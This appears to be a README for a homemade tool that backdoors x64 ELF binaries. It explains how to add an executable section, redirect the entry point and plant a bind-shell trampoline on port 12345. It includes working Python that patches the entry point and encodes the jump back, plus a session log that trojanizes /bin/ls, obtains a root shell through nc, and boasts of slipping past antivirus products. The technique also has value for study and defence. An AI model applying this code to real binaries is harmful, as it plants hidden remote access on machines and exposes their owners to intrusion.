Quick and Dirty Backdooring script for x64 ELF binaries
Manually injecting shellcode at an arbitrary offset of an ELF and hoping it does not break, using bash/python/radare2.
I'm not responsible for any malicious usage of this script; only execute the binaries generated by it on machines whose owners gave you permission. This tool is only a side project I played with.
This was inspired by reading the Practical Binary Analysis book, which was a great resource for getting the basics right.
How the Inject script works
- Inject a new read/write/execute section into the binary, done with objcopy.
- Change the entry point to the new section with radare2.
- Put the payload in the new section; nasm+ld are used to assemble the trampoline payload. The default payload is a bind shell that listens on port 12345.
- Jump back to the original entry point at the end of the trampoline payload, so the backdoored binary still does its normal job afterwards.
The trick is to set the section offset on unused code to avoid segfaults. The objcopy warning in the session below (`allocated section '.backdoor' not in segment`) means no program header maps the new section, and the loader only maps program headers, so the payload is reachable at runtime only because the chosen offset already falls inside an executable PT_LOAD segment; the bytes written there overwrite whatever code lives at that offset. Pick an offset inside a function the program does not execute, otherwise it crashes or misbehaves. Successful test on ls with section offset 0xbeef, no detection from AV like Symantec, Kaspersky, Fortinet ... I was quite surprised for a first attempt. UPDATE 2020-07-18: got detected by Avast, AVG.
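The arithmetic behind the session output (entry point rewrite, trampoline, and the `jmp` back to the original entry) as an added stand-alone example; this is not the Inject script's own code. It skips the objcopy section and writes the payload straight at the file offset, and adds the check the script does not make: that the offset lies inside an executable PT_LOAD and that the payload does not run past its end. The ELF image is a constructed stand-in (header plus one R+X segment with vaddr == file offset, as the ls listing below shows for its text region); the 173 NOPs stand in for the bind shell. With offset 0xbeef and original entry 0x5b20 it reproduces the `jmp` at 0xbf9c encoded as `e9 7f 9b ff ff`.

```python
import struct

PT_LOAD, PF_X, PF_R = 1, 1, 4
E_ENTRY_OFF = 24  # e_entry lives at offset 24 of the ELF64 header


def parse_ehdr(elf):
    """Return (e_entry, e_phoff, e_phentsize, e_phnum) of a little-endian ELF64."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    e_entry, e_phoff = struct.unpack_from("<QQ", elf, E_ENTRY_OFF)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 54)
    return e_entry, e_phoff, e_phentsize, e_phnum


def read_entry(elf):
    return parse_ehdr(elf)[0]


def exec_segment_for_offset(elf, off):
    """Find the executable PT_LOAD mapping file offset `off` -> (p_offset, p_vaddr, p_filesz).
    Raises if nothing executable maps it: that is exactly the case that segfaults at the new entry."""
    _, phoff, phentsize, phnum = parse_ehdr(elf)
    for i in range(phnum):
        p_type, p_flags, p_off, p_vaddr, _paddr, p_filesz = struct.unpack_from(
            "<IIQQQQ", elf, phoff + i * phentsize)
        if p_type == PT_LOAD and p_flags & PF_X and p_off <= off < p_off + p_filesz:
            return p_off, p_vaddr, p_filesz
    raise ValueError("offset 0x%x is not inside an executable PT_LOAD segment" % off)


def jmp_rel32(at, target):
    """Encode `jmp target` (E9 rel32) for a jmp placed at virtual address `at`;
    rel32 is relative to the next instruction, i.e. at + 5."""
    return b"\xe9" + struct.pack("<i", target - (at + 5))


def build_trampoline(shellcode, entry_vaddr, orig_entry):
    """Shellcode followed by a relative jmp back to the original entry (PIE-safe)."""
    jmp_at = entry_vaddr + len(shellcode)
    return shellcode + jmp_rel32(jmp_at, orig_entry), jmp_at


def inject(elf, shellcode, section_off):
    """Write shellcode+trampoline at file offset `section_off` and point e_entry at it."""
    orig_entry = read_entry(elf)
    p_off, p_vaddr, p_filesz = exec_segment_for_offset(elf, section_off)
    entry_vaddr = p_vaddr + (section_off - p_off)
    tramp, jmp_at = build_trampoline(shellcode, entry_vaddr, orig_entry)
    if section_off + len(tramp) > p_off + p_filesz:
        raise ValueError("payload would run past the end of the executable segment")
    out = bytearray(elf)
    out[section_off:section_off + len(tramp)] = tramp   # clobbers the code already there
    struct.pack_into("<Q", out, E_ENTRY_OFF, entry_vaddr)  # entry point -> our payload
    return bytes(out), {"orig_entry": orig_entry, "entry_vaddr": entry_vaddr,
                        "jmp_at": jmp_at, "trampoline": tramp}


def make_test_elf(size=0x20000, entry=0x5b20, text_off=0x4000, text_size=0x13400):
    """Constructed stand-in for a PIE: ELF64 header + one R+X PT_LOAD, vaddr == offset."""
    elf = bytearray(size)
    struct.pack_into("<4sBBBBB7xHHIQQQIHHHHHH", elf, 0,
                     b"\x7fELF", 2, 1, 1, 0, 0,   # ELF64, LSB, EV_CURRENT, SYSV ABI
                     3, 62, 1,                     # ET_DYN (PIE), EM_X86_64, e_version
                     entry, 64, 0, 0,              # e_entry, e_phoff, e_shoff, e_flags
                     64, 56, 1, 64, 0, 0)          # ehsize, phentsize, phnum, shentsize, shnum, shstrndx
    struct.pack_into("<IIQQQQQQ", elf, 64, PT_LOAD, PF_R | PF_X,
                     text_off, text_off, text_off, text_size, text_size, 0x1000)
    return bytes(elf)


if __name__ == "__main__":
    # Constructed payload stand-in: 173 NOPs, the shellcode size printed in the session.
    patched, info = inject(make_test_elf(), b"\x90" * 173, 0xbeef)
    print("Original entry=0x%x  jmp entry offset=0x%x  jmp bytes=%s"
          % (info["orig_entry"], info["jmp_at"], info["trampoline"][-5:].hex()))
```

The jmp is encoded in virtual-address space, which matters for a PIE: the payload and the original entry sit in the same image, so their distance is fixed no matter where the loader places it. On a real target run `exec_segment_for_offset` before writing anything; an offset that lands in .rodata or in the RW data segment passes objcopy fine but faults the instant the loader transfers control.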
Requirements
- radare2
- python
The steps above also call objcopy and nasm+ld.
Example session, backdooring /bin/ls (the first listing printed by the script is the binary's sections as virtual address and file offset pairs, to help you pick an offset):
```
[BlackB0x DirtyELFInjector ]# ./Inject
What Binary you want backdoor in /bin?
ls
0x0000000000002a8 0x00002a8
0x0000000000002e8 0x00002e8
0x000000000000308 0x0000308
0x0000000000003b8 0x00003b8
0x000000000000fb8 0x0000fb8
0x000000000001574 0x0001574
0x000000000001678 0x0001678
0x0000000000016f8 0x00016f8
0x0000000000034f8 0x00034f8
0x000000000004000 0x0004000
0x000000000004020 0x0004020
0x000000000004040 0x0004040
0x000000000000173c4 0x00173c4
0x000000000018000 0x0018000
0x00000000001d324 0x001d324
0x00000000001dc78 0x001dc78
0x000000000021fd0 0x0020fd0
0x000000000021fd8 0x0020fd8
0x000000000021fe0 0x0020fe0
0x000000000022a58 0x0021a58
0x000000000022c58 0x0021c58
0x000000000023000 0x0022000
0x000000000023280 0x0022268
0x000000000000000 0x0022268
0x000000000000000 0x00222b4
Section Offset? format: 0xbeef
0xbeef
LESO=efbe
objcopy: stVsHkjd: warning: allocated section `.backdoor' not in segment
objcopy: stcR435f: warning: allocated section `.backdoor' not in segment
Original entry=0x5b20
size of shellcode :173 bytes
jmp entry offset=0xbf9c
Warning: run r2 with -e io.cache=true to fix relocations in disassembly
Written 5 byte(s) (jmp 0x5b20 ) = wx e97f9bffff
-- In Soviet Russia, radare2 has documentation.
^D
[BlackB0x DirtyELFInjector]# file injected_ls
injected_ls: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=4fef2dc9762eb7d4593f402a65cc02bb3d4c48de, for GNU/Linux 3.2.0, stripped
[BlackB0x ls_rev_shell]# netstat -tunelp |grep 12345
[BlackB0x ls_rev_shell]# ./injected_ls
a.out bindshell.o gocave InjectBytes.py injected_git nopsection OLD README.md Trampoline.asm WORKS
bindshell.asm Enum Inject injected_find injected_ls objcopy Plan shellcode Trampoline.o
[BlackB0x DirtyELFInjector]# netstat -tunelp |grep 12345
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN 0 941082 28768/./injected_ls
[BlackB0x DirtyELFInjector]# nc localhost 12345
id
uid=0(root) gid=0(root) groups=0(root)
^C[BlackB0x DirtyELFInjector]# netstat -tunelp |grep 12345
```
The injected ls still lists the directory as usual (LESO is the section offset as little-endian bytes, the value written into e_entry), and right after it returns the bind shell is listening on 12345; the final netstat, after the nc session is closed, shows the listener gone again.